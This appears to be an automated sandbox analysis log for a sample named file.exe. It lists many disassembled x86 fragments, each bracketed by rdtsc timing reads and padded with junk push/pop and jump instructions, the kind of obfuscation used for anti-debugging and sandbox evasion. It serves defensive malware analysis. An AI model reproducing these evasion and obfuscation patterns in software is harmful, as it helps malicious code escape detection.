Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53901DB second address: 5390257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F1F50CBBC46h 0x0000000a or ch, 00000048h 0x0000000d jmp 00007F1F50CBBC3Bh 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 je 00007F1FC284A043h 0x0000001c jmp 00007F1F50CBBC46h 0x00000021 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F1F50CBBC3Dh 0x00000031 or cx, B816h 0x00000036 jmp 00007F1F50CBBC41h 0x0000003b popfd 0x0000003c movzx eax, di 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5390257 second address: 539025D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539025D second address: 5390261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5390261 second address: 5390290 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F1FC2B05D38h 0x0000000e pushad 0x0000000f call 00007F1F50F7797Eh 0x00000014 mov esi, 1EB07381h 0x00000019 pop ecx 0x0000001a mov dl, 64h 0x0000001c popad 0x0000001d mov edx, dword ptr [esi+44h] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5390290 second address: 5390296 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5390296 second address: 53902B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F50F77989h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380811 second address: 53808FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 jmp 00007F1F50CBBC3Ah 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F1F50CBBC3Eh 0x00000017 or si, 6578h 0x0000001c jmp 00007F1F50CBBC3Bh 0x00000021 popfd 0x00000022 mov si, F4AFh 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F1F50CBBC3Eh 0x00000031 sub si, FFD8h 0x00000036 jmp 00007F1F50CBBC3Bh 0x0000003b popfd 0x0000003c pushfd 0x0000003d jmp 00007F1F50CBBC48h 0x00000042 adc cl, 00000038h 0x00000045 jmp 00007F1F50CBBC3Bh 0x0000004a popfd 0x0000004b popad 0x0000004c mov bx, si 0x0000004f popad 0x00000050 and esp, FFFFFFF8h 0x00000053 pushad 0x00000054 jmp 00007F1F50CBBC40h 0x00000059 mov edi, eax 0x0000005b popad 0x0000005c xchg eax, ebx 0x0000005d jmp 00007F1F50CBBC3Ch 0x00000062 push eax 0x00000063 jmp 00007F1F50CBBC3Bh 0x00000068 xchg eax, ebx 0x00000069 jmp 00007F1F50CBBC46h 0x0000006e xchg eax, esi 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007F1F50CBBC47h 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53808FE second address: 5380945 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 2Ch 0x00000005 pushfd 0x00000006 jmp 00007F1F50F77980h 0x0000000b jmp 00007F1F50F77985h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F1F50F77983h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380945 second address: 5380962 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380962 second address: 53809C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F1F50F77987h 0x00000008 pop eax 0x00000009 mov edi, 4B9423ECh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xchg eax, esi 0x00000012 pushad 0x00000013 movsx edx, ax 0x00000016 pushfd 0x00000017 jmp 00007F1F50F7797Ah 0x0000001c xor ax, 6208h 0x00000021 jmp 00007F1F50F7797Bh 0x00000026 popfd 0x00000027 popad 0x00000028 mov esi, dword ptr [ebp+08h] 0x0000002b jmp 00007F1F50F77986h 0x00000030 sub ebx, ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 mov bh, 9Ch 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53809C8 second address: 5380A03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c call 00007F1F50CBBC44h 0x00000011 mov ah, 96h 0x00000013 pop ebx 0x00000014 pushad 0x00000015 mov edi, esi 0x00000017 push esi 0x00000018 pop edx 0x00000019 popad 0x0000001a popad 0x0000001b je 00007F1FC28515CCh 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380A03 second address: 5380A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380A08 second address: 5380A53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F1F50CBBC3Bh 0x00000019 sub esi, 4A74931Eh 0x0000001f jmp 00007F1F50CBBC49h 0x00000024 popfd 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380A53 second address: 5380A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380A58 second address: 5380A66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F50CBBC3Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380A66 second address: 5380ACE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, esi 0x0000000a pushad 0x0000000b mov al, dl 0x0000000d pushfd 0x0000000e jmp 00007F1F50F77986h 0x00000013 and esi, 77A08B78h 0x00000019 jmp 00007F1F50F7797Bh 0x0000001e popfd 0x0000001f popad 0x00000020 je 00007F1FC2B0D27Ch 0x00000026 jmp 00007F1F50F77986h 0x0000002b test byte ptr [76FA6968h], 00000002h 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F1F50F7797Ah 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380ACE second address: 5380AD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380AD4 second address: 5380ADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380ADA second address: 5380ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380ADE second address: 5380AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380AE2 second address: 5380B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F1FC2851502h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1F50CBBC3Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380B02 second address: 5380B08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380B08 second address: 5380B1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 mov cx, 695Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov edx, dword ptr [ebp+0Ch] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380B1D second address: 5380B21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380B21 second address: 5380B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380B27 second address: 5380B86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1F50F77984h 0x00000009 sub esi, 6B4714F8h 0x0000000f jmp 00007F1F50F7797Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F1F50F77988h 0x0000001b adc ch, 00000058h 0x0000001e jmp 00007F1F50F7797Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 xchg eax, ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov bx, AC46h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380B86 second address: 5380B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380B8B second address: 5380BCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F7797Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov bx, 7964h 0x0000000f mov edx, 3BE2C7D0h 0x00000014 popad 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F1F50F77980h 0x0000001f add si, 3418h 0x00000024 jmp 00007F1F50F7797Bh 0x00000029 popfd 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380CC6 second address: 5380CE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 0694h 0x00000007 push edx 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov esp, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1F50CBBC41h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380CE9 second address: 5380CEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380CEF second address: 5380CF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, al 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380CF6 second address: 5380D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov al, C2h 0x0000000d mov ax, di 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5390C7E second address: 5390C84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5390C84 second address: 5390CCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77984h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F1F50F77980h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov ecx, 1DA5A7D3h 0x00000018 jmp 00007F1F50F77988h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5390CCF second address: 5390D27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1F50CBBC41h 0x00000009 and al, 00000046h 0x0000000c jmp 00007F1F50CBBC41h 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 mov dx, cx 0x0000001c push esi 0x0000001d pop esi 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 call 00007F1F50CBBC48h 0x00000029 pop esi 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5390A61 second address: 5390A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5390A65 second address: 5390A69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5390A69 second address: 5390A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5390A6F second address: 5390A75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5390A75 second address: 5390A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5410619 second address: 5410658 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushfd 0x00000008 jmp 00007F1F50CBBC3Bh 0x0000000d and ah, 0000006Eh 0x00000010 jmp 00007F1F50CBBC49h 0x00000015 popfd 0x00000016 pop eax 0x00000017 popad 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F1F50CBBC3Ah 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5400A84 second address: 5400AB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1F50F7797Fh 0x00000009 jmp 00007F1F50F77983h 0x0000000e popfd 0x0000000f mov esi, 216CF89Fh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5400AB9 second address: 5400B11 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1F50CBBC3Ch 0x00000008 xor eax, 1F69DC08h 0x0000000e jmp 00007F1F50CBBC3Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007F1F50CBBC48h 0x0000001c add eax, 5F23FE68h 0x00000022 jmp 00007F1F50CBBC3Bh 0x00000027 popfd 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov cx, di 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5400B11 second address: 5400B16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5400B16 second address: 5400B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F1F50CBBC3Fh 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F1F50CBBC40h 0x00000017 or cx, 5328h 0x0000001c jmp 00007F1F50CBBC3Bh 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007F1F50CBBC48h 0x00000028 and ah, FFFFFF88h 0x0000002b jmp 00007F1F50CBBC3Bh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54008A2 second address: 54008A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53A0022 second address: 53A0027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5400E40 second address: 5400E61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 226B4A8Eh 0x00000008 mov cx, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 movzx eax, di 0x00000013 mov bx, A6ECh 0x00000017 popad 0x00000018 mov dword ptr [esp], ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5400E61 second address: 5400E7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50CBBC48h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5400E7D second address: 5400F23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 mov esi, 47C24849h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 jmp 00007F1F50F77984h 0x00000015 push dword ptr [ebp+0Ch] 0x00000018 jmp 00007F1F50F77980h 0x0000001d push dword ptr [ebp+08h] 0x00000020 jmp 00007F1F50F77980h 0x00000025 push 092B3459h 0x0000002a jmp 00007F1F50F77981h 0x0000002f xor dword ptr [esp], 092A345Bh 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 jmp 00007F1F50F77983h 0x0000003e pushfd 0x0000003f jmp 00007F1F50F77988h 0x00000044 adc al, FFFFFFB8h 0x00000047 jmp 00007F1F50F7797Bh 0x0000004c popfd 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5400F23 second address: 5400F29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5400F29 second address: 5400F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5400F2D second address: 5400F31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5400FA8 second address: 5400FCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5400FCC second address: 5400FD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FABB01 second address: FABB0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F1F50F77976h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FABD03 second address: FABD2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F50CBBC48h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c jbe 00007F1F50CBBC44h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: FABD2C second address: FABD30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B039F second address: 53B0416 instructions: 0x00000000 rdtsc 0x00000002 mov edx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F1F50CBBC3Eh 0x0000000d push eax 0x0000000e jmp 00007F1F50CBBC3Bh 0x00000013 xchg eax, ebp 0x00000014 jmp 00007F1F50CBBC46h 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F1F50CBBC3Eh 0x00000022 xor si, 1888h 0x00000027 jmp 00007F1F50CBBC3Bh 0x0000002c popfd 0x0000002d mov ecx, 2D8848FFh 0x00000032 popad 0x00000033 push FFFFFFFEh 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F1F50CBBC41h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0416 second address: 53B0486 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F50F77981h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 3554A069h 0x0000000e jmp 00007F1F50F77987h 0x00000013 xor dword ptr [esp], 43AC6071h 0x0000001a pushad 0x0000001b mov esi, 6E4935DBh 0x00000020 mov ax, 54B7h 0x00000024 popad 0x00000025 push 4519C273h 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushad 0x0000002e popad 0x0000002f pushfd 0x00000030 jmp 00007F1F50F77982h 0x00000035 adc al, FFFFFFD8h 0x00000038 jmp 00007F1F50F7797Bh 0x0000003d popfd 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0486 second address: 53B049E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F50CBBC44h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B049E second address: 53B04E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 31D5EB8Dh 0x0000000f jmp 00007F1F50F77987h 0x00000014 mov eax, dword ptr fs:[00000000h] 0x0000001a jmp 00007F1F50F77986h 0x0000001f nop 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B04E7 second address: 53B04EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B04EB second address: 53B04EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B04EF second address: 53B04F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B04F5 second address: 53B04FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B04FB second address: 53B04FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B04FF second address: 53B0503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B0503 second address: 53B05A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e mov dx, 3928h 0x00000012 popad 0x00000013 nop 0x00000014 pushad 0x00000015 mov bx, 0540h 0x00000019 push edx 0x0000001a pushfd 0x0000001b jmp 00007F1F50CBBC44h 0x00000020 sbb esi, 30426B88h 0x00000026 jmp 00007F1F50CBBC3Bh 0x0000002b popfd 0x0000002c pop esi 0x0000002d popad 0x0000002e sub esp, 1Ch 0x00000031 pushad 0x00000032 movsx edi, cx 0x00000035 mov ebx, eax 0x00000037 popad 0x00000038 xchg eax, ebx 0x00000039 jmp 00007F1F50CBBC48h 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 movzx ecx, dx 0x00000045 pushfd 0x00000046 jmp 00007F1F50CBBC49h 0x0000004b sub ecx, 2B84DAB6h 0x00000051 jmp 00007F1F50CBBC41h 0x00000056 popfd 0x00000057 popad 0x00000058 rdtsc
